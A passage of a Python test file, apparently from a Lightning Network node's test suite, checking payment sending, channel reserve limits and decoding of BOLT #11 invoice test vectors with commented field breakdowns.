rhash = l2.rpc.invoice(amt, 'testpayment2', 'desc')['payment_hash']
def invoice_unpaid(dst, label):
invoices = dst.rpc.listinvoices(label)['invoices']
return len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
def only_one(arr):
assert len(arr) == 1
return arr[0]
routestep = {
'msatoshi': amt,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
# Insufficient funds.
with pytest.raises(RpcError):
rs = copy.deepcopy(routestep)
rs['msatoshi'] = rs['msatoshi'] - 1
l1.rpc.sendpay([rs], rhash)
l1.rpc.waitsendpay(rhash)
assert invoice_unpaid(l2, 'testpayment2')
# Gross overpayment (more than factor of 2)
with pytest.raises(RpcError):
rs = copy.deepcopy(routestep)
rs['msatoshi'] = rs['msatoshi'] * 2 + 1
l1.rpc.sendpay([rs], rhash)
l1.rpc.waitsendpay(rhash)
assert invoice_unpaid(l2, 'testpayment2')
# Insufficient delay.
with pytest.raises(RpcError):
rs = copy.deepcopy(routestep)
rs['delay'] = rs['delay'] - 2
l1.rpc.sendpay([rs], rhash)
l1.rpc.waitsendpay(rhash)
assert invoice_unpaid(l2, 'testpayment2')
# Bad ID.
with pytest.raises(RpcError):
rs = copy.deepcopy(routestep)
rs['id'] = '00000000000000000000000000000000'
l1.rpc.sendpay([rs], rhash)
assert invoice_unpaid(l2, 'testpayment2')
# FIXME: test paying via another node, should fail to pay twice.
p1 = l1.rpc.getpeer(l2.info['id'], 'info')
p2 = l2.rpc.getpeer(l1.info['id'], 'info')
assert only_one(p1['channels'])['msatoshi_to_us'] == 10**6 * 1000
assert only_one(p1['channels'])['msatoshi_total'] == 10**6 * 1000
assert only_one(p2['channels'])['msatoshi_to_us'] == 0
assert only_one(p2['channels'])['msatoshi_total'] == 10**6 * 1000
# This works.
before = int(time.time())
details = l1.rpc.sendpay([routestep], rhash)
after = int(time.time())
preimage = l1.rpc.waitsendpay(rhash)['payment_preimage']
# Check details
assert details['payment_hash'] == rhash
assert details['destination'] == l2.info['id']
assert details['msatoshi'] == amt
assert details['created_at'] >= before
assert details['created_at'] <= after
# Check receiver
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['status'] == 'paid'
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['pay_index'] == 1
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['msatoshi_received'] == rs['msatoshi']
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['payment_preimage'] == preimage
# Balances should reflect it.
def check_balances():
p1 = l1.rpc.getpeer(l2.info['id'], 'info')
p2 = l2.rpc.getpeer(l1.info['id'], 'info')
return (
only_one(p1['channels'])['msatoshi_to_us'] == 10**6 * 1000 - amt
and only_one(p1['channels'])['msatoshi_total'] == 10**6 * 1000
and only_one(p2['channels'])['msatoshi_to_us'] == amt
and only_one(p2['channels'])['msatoshi_total'] == 10**6 * 1000
)
wait_for(check_balances)
# Repeat will "succeed", but won't actually send anything (duplicate)
assert not l1.daemon.is_in_log('Payment 0/1: .* COMPLETE')
details = l1.rpc.sendpay([routestep], rhash)
assert details['status'] == "complete"
preimage2 = details['payment_preimage']
assert preimage == preimage2
l1.daemon.wait_for_log('Payment 0/1: .* COMPLETE')
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['status'] == 'paid'
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['msatoshi_received'] == rs['msatoshi']
# Overpaying by "only" a factor of 2 succeeds.
rhash = l2.rpc.invoice(amt, 'testpayment3', 'desc')['payment_hash']
assert only_one(l2.rpc.listinvoices('testpayment3')['invoices'])['status'] == 'unpaid'
routestep = {'msatoshi': amt * 2, 'id': l2.info['id'], 'delay': 5, 'channel': '1x1x1'}
l1.rpc.sendpay([routestep], rhash)
preimage3 = l1.rpc.waitsendpay(rhash)['payment_preimage']
assert only_one(l2.rpc.listinvoices('testpayment3')['invoices'])['status'] == 'paid'
assert only_one(l2.rpc.listinvoices('testpayment3')['invoices'])['msatoshi_received'] == amt * 2
# Test listsendpays
payments = l1.rpc.listsendpays()['payments']
assert len(payments) == 2
invoice2 = only_one(l2.rpc.listinvoices('testpayment2')['invoices'])
payments = l1.rpc.listsendpays(payment_hash=invoice2['payment_hash'])['payments']
assert len(payments) == 1
assert payments[0]['status'] == 'complete'
assert payments[0]['payment_preimage'] == preimage2
invoice3 = only_one(l2.rpc.listinvoices('testpayment3')['invoices'])
payments = l1.rpc.listsendpays(payment_hash=invoice3['payment_hash'])['payments']
assert len(payments) == 1
assert payments[0]['status'] == 'complete'
assert payments[0]['payment_preimage'] == preimage3
@unittest.skipIf(TEST_NETWORK != 'regtest', "The reserve computation is bitcoin specific")
def test_sendpay_cant_afford(node_factory):
# Set feerates the same so we don't have to wait for update.
l1, l2 = node_factory.line_graph(2, fundamount=10**6,
opts={'feerates': (15000, 15000, 15000, 15000)})
# Can't pay more than channel capacity.
with pytest.raises(RpcError):
l1.pay(l2, 10**9 + 1)
# Reserve is 1%.
reserve = 10**7
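# A minimal sketch of where that constant comes from (assuming the reserve is
# computed from the funding amount): the channel was funded with 10**6 sat,
# i.e. 10**9 msat, and 1% of that is 10**7 msat.
assert 10**6 * 1000 // 100 == 10**7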
# # This is how we recalc constants (v. v. slow!)
# minimum = 1
# maximum = 10**9
# while maximum - minimum > 1:
# l1, l2 = node_factory.line_graph(2, fundamount=10**6,
# opts={'feerates': (15000, 15000, 15000, 15000)})
# try:
# l1.pay(l2, (minimum + maximum) // 2)
# minimum = (minimum + maximum) // 2
# except RpcError:
# maximum = (minimum + maximum) // 2
# print("{} - {}".format(minimum, maximum))
# assert False
# This is the fee, which needs to be taken into account for l1.
if EXPERIMENTAL_FEATURES:
# option_anchor_outputs
available = 10**9 - 44700000
else:
available = 10**9 - 32040000
# Can't pay past reserve.
with pytest.raises(RpcError):
l1.pay(l2, available)
with pytest.raises(RpcError):
l1.pay(l2, available - reserve + 1)
# Can pay up to reserve (1%)
l1.pay(l2, available - reserve)
# And now it can't pay back, due to its own reserve.
with pytest.raises(RpcError):
l2.pay(l1, available - reserve)
# But this should work.
l2.pay(l1, available - reserve * 2)
def test_decodepay(node_factory):
l1 = node_factory.get_node()
# BOLT #11:
# > ### Please make a donation of any amount using payment_hash 0001020304050607080900010203040506070809000102030405060708090102 to me @03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad
# > lnbc1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdpl2pkx2ctnv5sxxmmwwd5kgetjypeh2ursdae8g6twvus8g6rfwvs8qun0dfjkxaq8rkx3yf5tcsyz3d73gafnh3cax9rn449d9p5uxz9ezhhypd0elx87sjle52x86fux2ypatgddc6k63n7erqz25le42c4u4ecky03ylcqca784w
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash
# * `p5`: `data_length` (`p` = 1, `5` = 20. 1 * 32 + 20 == 52)
# * `qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypq`: payment hash 0001020304050607080900010203040506070809000102030405060708090102
# * `d`: short description
# * `pl`: `data_length` (`p` = 1, `l` = 31. 1 * 32 + 31 == 63)
# * `2pkx2ctnv5sxxmmwwd5kgetjypeh2ursdae8g6twvus8g6rfwvs8qun0dfjkxaq`: 'Please consider supporting this project'
# * `32vjcgqxyuj7nqphl3xmmhls2rkl3t97uan4j0xa87gj5779czc8p0z58zf5wpt9ggem6adl64cvawcxlef9djqwp2jzzfvs272504sp`: signature
# * `0lkg3c`: Bech32 checksum
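# A minimal sketch of how the `data_length` values quoted in these breakdowns
# are derived: each bech32 character encodes 5 bits, and the two length
# characters form a 10-bit big-endian integer (assumption: CHARSET below is
# the standard bech32 alphabet used by BOLT #11).
CHARSET = 'qpzry9x8gf2tvdw0s3jn54khce6mua7l'
assert CHARSET.index('p') * 32 + CHARSET.index('5') == 52  # payment hash field
assert CHARSET.index('p') * 32 + CHARSET.index('l') == 63  # description field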
b11 = l1.rpc.decodepay(
'lnbc1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqd'
'pl2pkx2ctnv5sxxmmwwd5kgetjypeh2ursdae8g6twvus8g6rfwvs8qun0dfjkxaq8rk'
'x3yf5tcsyz3d73gafnh3cax9rn449d9p5uxz9ezhhypd0elx87sjle52x86fux2ypatg'
'ddc6k63n7erqz25le42c4u4ecky03ylcqca784w'
)
assert b11['currency'] == 'bc'
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['description'] == 'Please consider supporting this project'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
# BOLT #11:
# > ### Please send $3 for a cup of coffee to the same peer, within 1 minute
# > lnbc2500u1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5xysxxatsyp3k7enxv4jsxqzpuaztrnwngzn3kdzw5hydlzf03qdgm2hdq27cqv3agm2awhz5se903vruatfhq77w3ls4evs3ch9zw97j25emudupq63nyw24cg27h2rspfj9srp
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `2500u`: amount (2500 micro-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `d`: short description
# * `q5`: `data_length` (`q` = 0, `5` = 20. 0 * 32 + 20 == 20)
# * `xysxxatsyp3k7enxv4js`: '1 cup coffee'
# * `x`: expiry time
# * `qz`: `data_length` (`q` = 0, `z` = 2. 0 * 32 + 2 == 2)
# * `pu`: 60 seconds (`p` = 1, `u` = 28. 1 * 32 + 28 == 60)
# * `azh8qt5w7qeewkmxtv55khqxvdfs9zzradsvj7rcej9knpzdwjykcq8gv4v2dl705pjadhpsc967zhzdpuwn5qzjm0s4hqm2u0vuhhqq`: signature
# * `7vc09u`: Bech32 checksum
b11 = l1.rpc.decodepay(
'lnbc2500u1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqf'
'qypqdq5xysxxatsyp3k7enxv4jsxqzpuaztrnwngzn3kdzw5hydlzf03qdgm2hdq27cq'
'v3agm2awhz5se903vruatfhq77w3ls4evs3ch9zw97j25emudupq63nyw24cg27h2rsp'
'fj9srp'
)
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 2500 * 10**11 // 1000000
assert b11['amount_msat'] == Millisatoshi(2500 * 10**11 // 1000000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['description'] == '1 cup coffee'
assert b11['expiry'] == 60
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
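# Worked arithmetic for the amount above: 'u' means micro-bitcoin and
# 1 BTC is 10**11 msat, so 2500u is 250,000,000 msat (0.0025 BTC).
assert 2500 * 10**11 // 1000000 == 250000000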
# BOLT #11:
# > ### Now send $24 for an entire list of things (hashed)
# > lnbc20m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqscc6gd6ql3jrc5yzme8v4ntcewwz5cnw92tz0pc8qcuufvq7khhr8wpald05e92xw006sq94mg8v2ndf4sefvf9sygkshp5zfem29trqq2yxxz7
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `h`: tagged field: hash of description
# * `p5`: `data_length` (`p` = 1, `5` = 20. 1 * 32 + 20 == 52)
# * `8yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqs`: SHA256 of 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon'
# * `vjfls3ljx9e93jkw0kw40yxn4pevgzflf83qh2852esjddv4xk4z70nehrdcxa4fk0t6hlcc6vrxywke6njenk7yzkzw0quqcwxphkcp`: signature
# * `vam37w`: Bech32 checksum
b11 = l1.rpc.decodepay(
'lnbc20m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqy'
'pqhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqscc6gd6ql3jr'
'c5yzme8v4ntcewwz5cnw92tz0pc8qcuufvq7khhr8wpald05e92xw006sq94mg8v2ndf'
'4sefvf9sygkshp5zfem29trqq2yxxz7',
'One piece of chocolate cake, one icecream cone, one pickle, one slic'
'e of swiss cheese, one slice of salami, one lollypop, one piece of c'
'herry pie, one sausage, one cupcake, and one slice of watermelon'
)
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(str(20 * 10**11 // 1000) + 'msat')
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
# > ### The same, on testnet, with a fallback address mk2QpYatsKicvFVuTAQLBryyccRXMUaGHP
# > lntb20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfpp3x9et2e20v6pu37c5d9vax37wxq72un98kmzzhznpurw9sgl2v0nklu2g4d0keph5t7tj9tcqd8rexnd07ux4uv2cjvcqwaxgj7v4uwn5wmypjd5n69z2xm3xgksg28nwht7f6zspwp3f9t
#
# Breakdown:
#
# * `lntb`: prefix, lightning on bitcoin testnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `f`: tagged field: fallback address
# * `pp`: `data_length` (`p` = 1. 1 * 32 + 1 == 33)
# * `3x9et2e20v6pu37c5d9vax37wxq72un98`: `3` = 17, so P2PKH address
# * `h`: tagged field: hash of description...
# * `qh84fmvn2klvglsjxfy0vq2mz6t9kjfzlxfwgljj35w2kwa60qv49k7jlsgx43yhs9nuutllkhhnt090mmenuhp8ue33pv4klmrzlcqp`: signature
# * `us2s2r`: Bech32 checksum
b11 = l1.rpc.decodepay(
'lntb20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahr'
'qspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfpp3x9et2e2'
'0v6pu37c5d9vax37wxq72un98kmzzhznpurw9sgl2v0nklu2g4d0keph5t7tj9tcqd8r'
'exnd07ux4uv2cjvcqwaxgj7v4uwn5wmypjd5n69z2xm3xgksg28nwht7f6zspwp3f9t',
'One piece of chocolate cake, one icecream cone, one pickle, one slic'
'e of swiss cheese, one slice of salami, one lollypop, one piece of c'
'herry pie, one sausage, one cupcake, and one slice of watermelon'
)
assert b11['currency'] == 'tb'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2PKH'
assert b11['fallbacks'][0]['addr'] == 'mk2QpYatsKicvFVuTAQLBryyccRXMUaGHP'
# > ### On mainnet, with fallback address 1RustyRX2oai4EYYDpQGWvEL62BBGqN9T with extra routing info to go via nodes 029e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255 then 039e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255
# > lnbc20m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqsfpp3qjmp7lwpagxun9pygexvgpjdc4jdj85fr9yq20q82gphp2nflc7jtzrcazrra7wwgzxqc8u7754cdlpfrmccae92qgzqvzq2ps8pqqqqqqpqqqqq9qqqvpeuqafqxu92d8lr6fvg0r5gv0heeeqgcrqlnm6jhphu9y00rrhy4grqszsvpcgpy9qqqqqqgqqqqq7qqzqj9n4evl6mr5aj9f58zp6fyjzup6ywn3x6sk8akg5v4tgn2q8g4fhx05wf6juaxu9760yp46454gpg5mtzgerlzezqcqvjnhjh8z3g2qqdhhwkj
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `h`: tagged field: hash of description...
# * `f`: tagged field: fallback address
# * `pp`: `data_length` (`p` = 1. 1 * 32 + 1 == 33)
# * `3` = 17, so P2PKH address
# * `qjmp7lwpagxun9pygexvgpjdc4jdj85f`: 160 bit P2PKH address
# * `r`: tagged field: route information
# * `9y`: `data_length` (`9` = 5, `y` = 4. 5 * 32 + 4 = 164)
# `q20q82gphp2nflc7jtzrcazrra7wwgzxqc8u7754cdlpfrmccae92qgzqvzq2ps8pqqqqqqqqqqqq9qqqvpeuqafqxu92d8lr6fvg0r5gv0heeeqgcrqlnm6jhphu9y00rrhy4grqszsvpcgpy9qqqqqqqqqqqq7qqzq`: pubkey `029e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255`, `short_channel_id` 0102030405060708, `fee_base_msat` 1 millisatoshi, `fee_proportional_millionths` 20, `cltv_expiry_delta` 3. pubkey `039e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255`, `short_channel_id` 030405060708090a, `fee_base_msat` 2 millisatoshi, `fee_proportional_millionths` 30, `cltv_expiry_delta` 4.
# * `j9n4evl6mr5aj9f58zp6fyjzup6ywn3x6sk8akg5v4tgn2q8g4fhx05wf6juaxu9760yp46454gpg5mtzgerlzezqcqvjnhjh8z3g2qq`: signature
# * `dhhwkj`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc20m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqsfpp3qjmp7lwpagxun9pygexvgpjdc4jdj85fr9yq20q82gphp2nflc7jtzrcazrra7wwgzxqc8u7754cdlpfrmccae92qgzqvzq2ps8pqqqqqqpqqqqq9qqqvpeuqafqxu92d8lr6fvg0r5gv0heeeqgcrqlnm6jhphu9y00rrhy4grqszsvpcgpy9qqqqqqgqqqqq7qqzqj9n4evl6mr5aj9f58zp6fyjzup6ywn3x6sk8akg5v4tgn2q8g4fhx05wf6juaxu9760yp46454gpg5mtzgerlzezqcqvjnhjh8z3g2qqdhhwkj', 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2PKH'
assert b11['fallbacks'][0]['addr'] == '1RustyRX2oai4EYYDpQGWvEL62BBGqN9T'
assert len(b11['routes']) == 1
assert len(b11['routes'][0]) == 2
assert b11['routes'][0][0]['pubkey'] == '029e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255'
# 0x010203:0x040506:0x0708
assert b11['routes'][0][0]['short_channel_id'] == '66051x263430x1800'
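# Illustrative conversion for the comment above (assumption: the scid string
# is "<block>x<txindex>x<output>", each field taken from the quoted hex).
assert '{}x{}x{}'.format(0x010203, 0x040506, 0x0708) == '66051x263430x1800'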
assert b11['routes'][0][0]['fee_base_msat'] == 1
assert b11['routes'][0][0]['fee_proportional_millionths'] == 20
assert b11['routes'][0][0]['cltv_expiry_delta'] == 3
assert b11['routes'][0][1]['pubkey'] == '039e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255'
# 0x030405:0x060708:0x090a
assert b11['routes'][0][1]['short_channel_id'] == '197637x395016x2314'
assert b11['routes'][0][1]['fee_base_msat'] == 2
assert b11['routes'][0][1]['fee_proportional_millionths'] == 30
assert b11['routes'][0][1]['cltv_expiry_delta'] == 4
# > ### On mainnet, with fallback (P2SH) address 3EktnHQD7RiAE6uzMj2ZifT9YgRrkSgzQX
# > lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfppj3a24vwu6r8ejrss3axul8rxldph2q7z9kmrgvr7xlaqm47apw3d48zm203kzcq357a4ls9al2ea73r8jcceyjtya6fu5wzzpe50zrge6ulk4nvjcpxlekvmxl6qcs9j3tz0469gq5g658y
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `f`: tagged field: fallback address.
# * `pp`: `data_length` (`p` = 1. 1 * 32 + 1 == 33)
# * `j3a24vwu6r8ejrss3axul8rxldph2q7z9`: `j` = 18, so P2SH address
# * `h`: tagged field: hash of description...
# * `2jhz8j78lv2jynuzmz6g8ve53he7pheeype33zlja5azae957585uu7x59w0f2l3rugyva6zpu394y4rh093j6wxze0ldsvk757a9msq`: signature
# * `mf9swh`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfppj3a24vwu6r8ejrss3axul8rxldph2q7z9kmrgvr7xlaqm47apw3d48zm203kzcq357a4ls9al2ea73r8jcceyjtya6fu5wzzpe50zrge6ulk4nvjcpxlekvmxl6qcs9j3tz0469gq5g658y', 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2SH'
assert b11['fallbacks'][0]['addr'] == '3EktnHQD7RiAE6uzMj2ZifT9YgRrkSgzQX'
# > ### On mainnet, with fallback (P2WPKH) address bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4
# > lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfppqw508d6qejxtdg4y5r3zarvary0c5xw7kepvrhrm9s57hejg0p662ur5j5cr03890fa7k2pypgttmh4897d3raaq85a293e9jpuqwl0rnfuwzam7yr8e690nd2ypcq9hlkdwdvycqa0qza8
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `f`: tagged field: fallback address.
# * `pp`: `data_length` (`p` = 1. 1 * 32 + 1 == 33)
# * `q`: 0, so witness version 0.
# * `qw508d6qejxtdg4y5r3zarvary0c5xw7k`: 160 bits = P2WPKH.
# * `h`: tagged field: hash of description...
# * `gw6tk8z0p0qdy9ulggx65lvfsg3nxxhqjxuf2fvmkhl9f4jc74gy44d5ua9us509prqz3e7vjxrftn3jnk7nrglvahxf7arye5llphgq`: signature
# * `qdtpa4`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfppqw508d6qejxtdg4y5r3zarvary0c5xw7kepvrhrm9s57hejg0p662ur5j5cr03890fa7k2pypgttmh4897d3raaq85a293e9jpuqwl0rnfuwzam7yr8e690nd2ypcq9hlkdwdvycqa0qza8', 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2WPKH'
assert b11['fallbacks'][0]['addr'] == 'bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4'
# > ### On mainnet, with fallback (P2WSH) address bc1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qccfmv3
# > lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfp4qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3q28j0v3rwgy9pvjnd48ee2pl8xrpxysd5g44td63g6xcjcu003j3qe8878hluqlvl3km8rm92f5stamd3jw763n3hck0ct7p8wwj463cql26ava
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `f`: tagged field: fallback address.
# * `p4`: `data_length` (`p` = 1, `4` = 21. 1 * 32 + 21 == 53)
# * `q`: 0, so witness version 0.
# * `rp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3q`: 260 bits = P2WSH.
# * `h`: tagged field: hash of description...
# * `5yps56lmsvgcrf476flet6js02m93kgasews8q3jhtp7d6cqckmh70650maq4u65tk53ypszy77v9ng9h2z3q3eqhtc3ewgmmv2grasp`: signature
# * `akvd7y`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfp4qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3q28j0v3rwgy9pvjnd48ee2pl8xrpxysd5g44td63g6xcjcu003j3qe8878hluqlvl3km8rm92f5stamd3jw763n3hck0ct7p8wwj463cql26ava', 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2WSH'
assert b11['fallbacks'][0]['addr'] == 'bc1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qccfmv3'
# > ### Please send $30 for coffee beans to the same peer, which supports features 1 and 9
# > lnbc25m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5vdhkven9v5sxyetpdees9qzsze992adudgku8p05pstl6zh7av6rx2f297pv89gu5q93a0hf3g7lynl3xq56t23dpvah6u7y9qey9lccrdml3gaqwc6nxsl5ktzm464sq73t7cl
#
# Breakdown:
#
# * `lnbc`: prefix, Lightning on Bitcoin mainnet
# * `25m`: amount (25 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `d`: short description
